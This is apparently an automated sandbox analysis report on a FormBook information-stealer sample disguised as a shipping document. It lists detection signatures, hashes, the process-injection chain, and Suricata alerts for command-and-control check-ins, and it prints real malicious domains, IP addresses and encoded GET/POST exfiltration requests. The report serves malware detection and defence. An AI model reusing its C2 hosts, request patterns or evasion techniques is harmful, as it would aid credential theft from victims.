Windows Analysis Report
DRAFT COPY BL, CI & PL.exe

Overview

General Information

Sample name: DRAFT COPY BL, CI & PL.exe
Analysis ID: 1571295
MD5: 0fac19920fd79caf5abd90da55b6a5e9
SHA1: 804e3083eedc496d77ce7a5537fe9aa36ee68bd1
SHA256: da172efecaad48e51e4fa1907014ed7f7b871bd701d9690c4a5a1f0530e34397
Tags: exeFormbookuser-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DRAFT COPY BL, CI & PL.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe" MD5: 0FAC19920FD79CAF5ABD90DA55B6A5E9)
    • svchost.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • oFlOzErifOVgUf.exe (PID: 5592 cmdline: "C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 5764 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • firefox.exe (PID: 5924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", CommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", ParentImage: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe, ParentProcessId: 7088, ParentProcessName: DRAFT COPY BL, CI & PL.exe, ProcessCommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", ProcessId: 6276, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", CommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", ParentImage: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe, ParentProcessId: 7088, ParentProcessName: DRAFT COPY BL, CI & PL.exe, ProcessCommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", ProcessId: 6276, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T09:11:03.518511+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49797 | 217.160.0.113 | 80 | TCP
2024-12-09T09:11:06.236207+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49804 | 217.160.0.113 | 80 | TCP
2024-12-09T09:11:08.904181+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49811 | 217.160.0.113 | 80 | TCP
2024-12-09T09:11:28.652905+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49858 | 154.90.58.209 | 80 | TCP
2024-12-09T09:11:31.308929+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49864 | 154.90.58.209 | 80 | TCP
2024-12-09T09:11:33.980808+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49871 | 154.90.58.209 | 80 | TCP
2024-12-09T09:11:44.002220+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49897 | 38.181.21.178 | 80 | TCP
2024-12-09T09:11:46.696987+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49904 | 38.181.21.178 | 80 | TCP
2024-12-09T09:11:49.471268+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49912 | 38.181.21.178 | 80 | TCP
2024-12-09T09:12:08.371814+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49958 | 23.167.152.41 | 80 | TCP
2024-12-09T09:12:11.033303+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49967 | 23.167.152.41 | 80 | TCP
2024-12-09T09:12:13.701206+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49973 | 23.167.152.41 | 80 | TCP
2024-12-09T09:12:24.090048+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49997 | 103.75.185.22 | 80 | TCP
2024-12-09T09:12:26.746209+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50006 | 103.75.185.22 | 80 | TCP
2024-12-09T09:12:29.402336+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50012 | 103.75.185.22 | 80 | TCP
2024-12-09T09:12:38.888222+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50024 | 162.0.213.94 | 80 | TCP
2024-12-09T09:12:41.548244+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50025 | 162.0.213.94 | 80 | TCP

AV Detection

Source: http://www.44ynh.top/l9wb/ | Avira URL Cloud: Label: malware
Source: http://www.44ynh.top/l9wb/?X25tIdT0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=&_PMl3=z6VH1Hp8JH | Avira URL Cloud: Label: malware
Source: DRAFT COPY BL, CI & PL.exe | ReversingLabs: Detection: 44%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3520903347.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2221199653.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3520852127.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: DRAFT COPY BL, CI & PL.exe | Joe Sandbox ML: detected
Source: DRAFT COPY BL, CI & PL.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: tzutil.pdbGCTL | source: svchost.exe, 00000001.00000003.2188962143.0000000003626000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188878550.000000000361B000.00000004.00000020.00020000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000003.2228659382.000000000116B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: oFlOzErifOVgUf.exe, 00000005.00000000.2145067730.000000000006E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707183628.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707820889.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2121845670.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2123770823.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2221550559.00000000035C8000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2224087314.000000000377D000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003930000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707183628.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707820889.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2221539136.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2121845670.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2123770823.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000006.00000002.3521136563.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2221550559.00000000035C8000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2224087314.000000000377D000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003930000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.00000000047AC000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000003F5C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.000000000327D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C48C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.00000000047AC000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000003F5C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.000000000327D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C48C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: tzutil.pdb | source: svchost.exe, 00000001.00000003.2188962143.0000000003626000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188878550.000000000361B000.00000004.00000020.00020000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000003.2228659382.000000000116B000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099445A GetFileAttributesW,FindFirstFileW,FindClose | 0_2_0099445A
Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099C6D1 FindFirstFileW,FindClose | 0_2_0099C6D1
Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_0099C75C
Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0099EF95
Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0099F0F2
Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0099F3F3
Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_009937EF
Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00993B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00993B12
Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0099BCBC
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_02F8C8A0 FindFirstFileW,FindNextFileW,FindClose | 6_2_02F8C8A0
Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | Code function: 4x nop then pop edi | 5_2_0132B04F
Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | Code function: 4x nop then xor eax, eax | 5_2_0132E8A9
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 4x nop then xor eax, eax | 6_2_02F79EA0
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 4x nop then mov ebx, 00000004h | 6_2_037704CE

Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49864 -> 154.90.58.209:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49797 -> 217.160.0.113:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49811 -> 217.160.0.113:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49904 -> 38.181.21.178:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49897 -> 38.181.21.178:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49912 -> 38.181.21.178:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49804 -> 217.160.0.113:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49973 -> 23.167.152.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49997 -> 103.75.185.22:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49858 -> 154.90.58.209:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 23.167.152.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 162.0.213.94:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 103.75.185.22:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 162.0.213.94:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49871 -> 154.90.58.209:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49958 -> 23.167.152.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50006 -> 103.75.185.22:80
Source: Joe Sandbox View | IP Address: 162.0.213.94
Source: Joe Sandbox View | IP Address: 217.160.0.113
Source: Joe Sandbox View | ASN Name: ACPCA
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View | ASN Name: VNBOOKING-AS-VNVietNamBookingcorporationVN
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009A22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 0_2_009A22EE
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Content-Encoding: gzip | Content-Type: text/html; charset=UTF-8 | Date: Mon, 09 Dec 2024 08:11:28 GMT | Server: nginx | Vary: Accept-Encoding | Content-Length: 44 | Connection: close | Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 | Data Ascii: KLIU(WHO-QHKM.g
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Content-Encoding: gzip | Content-Type: text/html; charset=UTF-8 | Date: Mon, 09 Dec 2024 08:11:31 GMT | Server: nginx | Vary: Accept-Encoding | Content-Length: 44 | Connection: close | Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 | Data Ascii: KLIU(WHO-QHKM.g
Source: global traffic | HTTP traffic detected: GET /q3v1/?_PMl3=z6VH1Hp8JH&X25tIdT0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs= HTTP/1.1 | Host: www.supernutra01.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic | HTTP traffic detected: GET /m5si/?X25tIdT0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&_PMl3=z6VH1Hp8JH HTTP/1.1 | Host: www.prestigerugz.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic | HTTP traffic detected: GET /521z/?X25tIdT0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&_PMl3=z6VH1Hp8JH HTTP/1.1 | Host: www.jijievo.site | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic | HTTP traffic detected: GET /l9wb/?X25tIdT0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=&_PMl3=z6VH1Hp8JH HTTP/1.1 | Host: www.44ynh.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic | HTTP traffic detected: GET /q34f/?X25tIdT0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58=&_PMl3=z6VH1Hp8JH HTTP/1.1 | Host: www.75178.club | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic | HTTP traffic detected: GET /syud/?X25tIdT0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&_PMl3=z6VH1Hp8JH HTTP/1.1 | Host: www.taxitayninh365.site | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic | DNS traffic detected: DNS query: www.supernutra01.online
Source: global traffic | DNS traffic detected: DNS query: www.prestigerugz.info
Source: global traffic | DNS traffic detected: DNS query: www.buckser.info
Source: global traffic | DNS traffic detected: DNS query: www.jijievo.site
Source: global traffic | DNS traffic detected: DNS query: www.44ynh.top
Source: global traffic | DNS traffic detected: DNS query: www.setwayidiomas.online
Source: global traffic | DNS traffic detected: DNS query: www.75178.club
Source: global traffic | DNS traffic detected: DNS query: www.taxitayninh365.site
Source: global traffic | DNS traffic detected: DNS query: www.ontherise.top
Source: unknown | HTTP traffic detected: POST /m5si/ HTTP/1.1 | Host: www.prestigerugz.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Accept-Encoding: gzip, deflate, br | Content-Type: application/x-www-form-urlencoded | Connection: close | Cache-Control: no-cache | Content-Length: 205 | Origin: http://www.prestigerugz.info | Referer: http://www.prestigerugz.info/m5si/ | User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 | Data Raw: 58 32 35 74 49 64 54 30 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2b 35 30 62 56 33 69 4b 49 77 73 5a 38 4e 54 4b 4c 6c 79 53 48 37 37 34 5a 4c 45 45 48 6e 4b 39 4a 31 36 50 50 6a 52 53 37 66 57 65 6c 7a 52 6c 48 58 49 54 70 71 37 69 72 6a 57 51 44 71 7a 4c 4e 49 36 61 6e 61 49 73 6c 6b 2f 37 38 7a 2f 50 74 76 54 79 79 63 52 67 70 6b 30 4b 73 55 35 59 38 78 75 36 7a 64 77 77 4c 76 6e 43 6d 34 32 79 63 4f 35 74 76 41 48 76 30 7a 71 66 32 69 33 37 63 75 31 39 48 72 55 43 4b 42 4f 4b 2b 69 61 35 7a 6d 44 67 7a 44 61 2f 43 64 75 4d 77 54 70 51 53 74 73 4d 76 70 62 67 4c 59 75 58 71 45 66 46 47 57 77 46 56 77 3d 3d | Data Ascii: X25tIdT0=TowXiW7yiZaI+50bV3iKIwsZ8NTKLlySH774ZLEEHnK9J16PPjRS7fWelzRlHXITpq7irjWQDqzLNI6anaIslk/78z/PtvTyycRgpk0KsU5Y8xu6zdwwLvnCm42ycO5tvAHv0zqf2i37cu19HrUCKBOK+ia5zmDgzDa/CduMwTpQStsMvpbgLYuXqEfFGWwFVw==
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Mon, 09 Dec 2024 08:11:03 GMT | Server: Apache | X-Frame-Options: deny | Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Mon, 09 Dec 2024 08:11:06 GMT | Server: Apache | X-Frame-Options: deny | Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Mon, 09 Dec 2024 08:11:08 GMT | Server: Apache | X-Frame-Options: deny | Content-Encoding: gzip
